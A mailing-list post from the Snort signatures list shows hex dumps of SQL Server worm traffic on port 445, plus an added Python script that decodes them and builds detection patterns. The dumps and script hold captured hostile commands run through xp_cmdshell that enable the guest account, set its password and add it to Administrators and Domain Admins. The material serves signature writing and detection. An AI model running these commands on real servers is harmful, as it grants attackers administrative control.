[Snort-sigs] SQL Worm port 445 traces

Robert Wagner rwagner at ...447...
Tue May 21 15:30:02 EDT 2002


Here is some more information about traffic coming across 445.  These are
just some of the packets that came across:


0x0080: 01 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00  ..e.x.e.c. .x.p.
0x0090: 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00  _.c.m.d.s.h.e.l.
0x00A0: 6C 00 20 00 27 00 6E 00 65 00 74 00 20 00 75 00  l. .'.n.e.t. .u.
0x00B0: 73 00 65 00 72 00 20 00 67 00 75 00 65 00 73 00  s.e.r. .g.u.e.s.
0x00C0: 74 00 20 00 2F 00 61 00 63 00 74 00 69 00 76 00  t. ./.a.c.t.i.v.
0x00D0: 65 00 3A 00 79 00 65 00 73 00 27 00              e.:.y.e.s.'.

--> Nice of it to reactivate my deactivated guest account for me

0x0080: 01 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00  ..e.x.e.c. .x.p.
0x0090: 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00  _.c.m.d.s.h.e.l.
0x00A0: 6C 00 20 00 27 00 6E 00 65 00 74 00 20 00 75 00  l. .'.n.e.t. .u.
0x00B0: 73 00 65 00 72 00 20 00 67 00 75 00 65 00 73 00  s.e.r. .g.u.e.s.
0x00C0: 74 00 20 00 6F 00 34 00 63 00 33 00 65 00 33 00  t. .o.4.c.3.e.3.
0x00D0: 63 00 39 00 27 00                                c.9.'.

--> I am not sure when the password was changed to this. 

0x0080: 01 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00  ..e.x.e.c. .x.p.
0x0090: 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00  _.c.m.d.s.h.e.l.
0x00A0: 6C 00 20 00 27 00 6E 00 65 00 74 00 20 00 6C 00  l. .'.n.e.t. .l.
0x00B0: 6F 00 63 00 61 00 6C 00 67 00 72 00 6F 00 75 00  o.c.a.l.g.r.o.u.
0x00C0: 70 00 20 00 61 00 64 00 6D 00 69 00 6E 00 69 00  p. .a.d.m.i.n.i.
0x00D0: 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 73 00  s.t.r.a.t.o.r.s.
0x00E0: 20 00 67 00 75 00 65 00 73 00 74 00 20 00 2F 00   .g.u.e.s.t. ./.
0x00F0: 61 00 64 00 64 00 27 00                          a.d.d.'.

--> Cool! Now that guest is part of Administrators, I can forget my admin
account ID and password.

0x0080: 01 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00  ..e.x.e.c. .x.p.
0x0090: 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00  _.c.m.d.s.h.e.l.
0x00A0: 6C 00 20 00 27 00 6E 00 65 00 74 00 20 00 67 00  l. .'.n.e.t. .g.
0x00B0: 72 00 6F 00 75 00 70 00 20 00 22 00 44 00 6F 00  r.o.u.p. .".D.o.
0x00C0: 6D 00 61 00 69 00 6E 00 20 00 41 00 64 00 6D 00  m.a.i.n. .A.d.m.
0x00D0: 69 00 6E 00 73 00 22 00 20 00 67 00 75 00 65 00  i.n.s.". .g.u.e.
0x00E0: 73 00 74 00 20 00 2F 00 61 00 64 00 64 00 27 00  s.t. ./.a.d.d.'.

--> Now guest is part of the Domain Admins!
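
All four dumps are the same thing: a T-SQL batch to SQL Server, which TDS carries as UCS-2 (UTF-16LE), hence the 00 byte after every character. As an added example that is not part of the original post, the Python below decodes such hex dumps back to the statement, flags xp_cmdshell and the specific account changes seen here (enable guest, set its password, add it to Administrators and to Domain Admins), and shows what a content match has to look like to hit the null-interleaved form. The function names and finding labels are my own; the dump text is the four excerpts from this post.

```python
"""Decode UCS-2 T-SQL payloads from hex dumps and flag account manipulation
via xp_cmdshell. Helper names (parse_hexdump, decode_tsql, classify,
snort_content) are assumptions for this example, not from Snort."""
import re

# The four payload excerpts quoted in the post. Only the hex column is
# parsed; the ASCII column on the right is ignored.
DUMPS = [
"""0x0080: 01 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00  ..e.x.e.c. .x.p.
0x0090: 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00  _.c.m.d.s.h.e.l.
0x00A0: 6C 00 20 00 27 00 6E 00 65 00 74 00 20 00 75 00  l. .'.n.e.t. .u.
0x00B0: 73 00 65 00 72 00 20 00 67 00 75 00 65 00 73 00  s.e.r. .g.u.e.s.
0x00C0: 74 00 20 00 2F 00 61 00 63 00 74 00 69 00 76 00  t. ./.a.c.t.i.v.
0x00D0: 65 00 3A 00 79 00 65 00 73 00 27 00              e.:.y.e.s.'.""",
"""0x0080: 01 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00  ..e.x.e.c. .x.p.
0x0090: 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00  _.c.m.d.s.h.e.l.
0x00A0: 6C 00 20 00 27 00 6E 00 65 00 74 00 20 00 75 00  l. .'.n.e.t. .u.
0x00B0: 73 00 65 00 72 00 20 00 67 00 75 00 65 00 73 00  s.e.r. .g.u.e.s.
0x00C0: 74 00 20 00 6F 00 34 00 63 00 33 00 65 00 33 00  t. .o.4.c.3.e.3.
0x00D0: 63 00 39 00 27 00                                c.9.'.""",
"""0x0080: 01 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00  ..e.x.e.c. .x.p.
0x0090: 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00  _.c.m.d.s.h.e.l.
0x00A0: 6C 00 20 00 27 00 6E 00 65 00 74 00 20 00 6C 00  l. .'.n.e.t. .l.
0x00B0: 6F 00 63 00 61 00 6C 00 67 00 72 00 6F 00 75 00  o.c.a.l.g.r.o.u.
0x00C0: 70 00 20 00 61 00 64 00 6D 00 69 00 6E 00 69 00  p. .a.d.m.i.n.i.
0x00D0: 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 73 00  s.t.r.a.t.o.r.s.
0x00E0: 20 00 67 00 75 00 65 00 73 00 74 00 20 00 2F 00   .g.u.e.s.t. ./.
0x00F0: 61 00 64 00 64 00 27 00                          a.d.d.'.""",
"""0x0080: 01 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00  ..e.x.e.c. .x.p.
0x0090: 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00  _.c.m.d.s.h.e.l.
0x00A0: 6C 00 20 00 27 00 6E 00 65 00 74 00 20 00 67 00  l. .'.n.e.t. .g.
0x00B0: 72 00 6F 00 75 00 70 00 20 00 22 00 44 00 6F 00  r.o.u.p. .".D.o.
0x00C0: 6D 00 61 00 69 00 6E 00 20 00 41 00 64 00 6D 00  m.a.i.n. .A.d.m.
0x00D0: 69 00 6E 00 73 00 22 00 20 00 67 00 75 00 65 00  i.n.s.". .g.u.e.
0x00E0: 73 00 74 00 20 00 2F 00 61 00 64 00 64 00 27 00  s.t. ./.a.d.d.'.""",
]

HEX_LINE = re.compile(r"^0x[0-9A-Fa-f]+:\s+(.*)$")

def parse_hexdump(dump: str) -> bytes:
    """Collect raw bytes from 'offset: XX XX ...  ascii' lines. The hex
    column is separated from the ASCII column by at least two spaces."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEX_LINE.match(line.strip())
        if m:
            out += bytes.fromhex(m.group(1).split("  ", 1)[0])
    return bytes(out)

def decode_tsql(payload: bytes) -> str:
    """TDS sends batch text as UCS-2 little-endian; decode it and drop the
    non-printable bytes (the leading 01 00) that precede the statement."""
    text = payload.decode("utf-16-le", errors="replace")
    return "".join(ch for ch in text if ch.isprintable()).strip()

# What each decoded statement does to the guest account.
PATTERNS = [
    ("enable-account", re.compile(r"\bnet\s+user\s+\S+\s+/active:yes", re.I)),
    ("set-password", re.compile(r"\bnet\s+user\s+\S+\s+[^/\s]\S*", re.I)),
    ("add-local-admin", re.compile(r"\bnet\s+localgroup\s+administrators\s+\S+\s+/add", re.I)),
    ("add-domain-admin", re.compile(r'\bnet\s+group\s+"domain admins"\s+\S+\s+/add', re.I)),
]

def classify(statement: str) -> list:
    """Report any xp_cmdshell use plus the recognised account change."""
    findings = []
    if re.search(r"\bxp_cmdshell\b", statement, re.I):
        findings.append("xp_cmdshell")
    findings += [label for label, pat in PATTERNS if pat.search(statement)]
    return findings

def snort_content(keyword: str) -> str:
    """Content string matching KEYWORD as it appears on the wire in UCS-2:
    each character followed by a null byte. A plain ASCII match for
    "xp_cmdshell" never fires on these packets."""
    return "".join(f"{ch}|00|" for ch in keyword)

def analyse(dumps=DUMPS) -> list:
    """Decode every dump and pair the statement with its findings."""
    return [(s, classify(s)) for s in (decode_tsql(parse_hexdump(d)) for d in dumps)]

if __name__ == "__main__":
    for stmt, findings in analyse():
        print(f"{stmt!r} -> {findings}")
    print('content:"' + snort_content("xp_cmdshell") + '"')
```

The keyword rendered by snort_content is the form a signature needs for this traffic; the same applies to "net user" or "net localgroup" if you want to alert on the account changes rather than on xp_cmdshell alone.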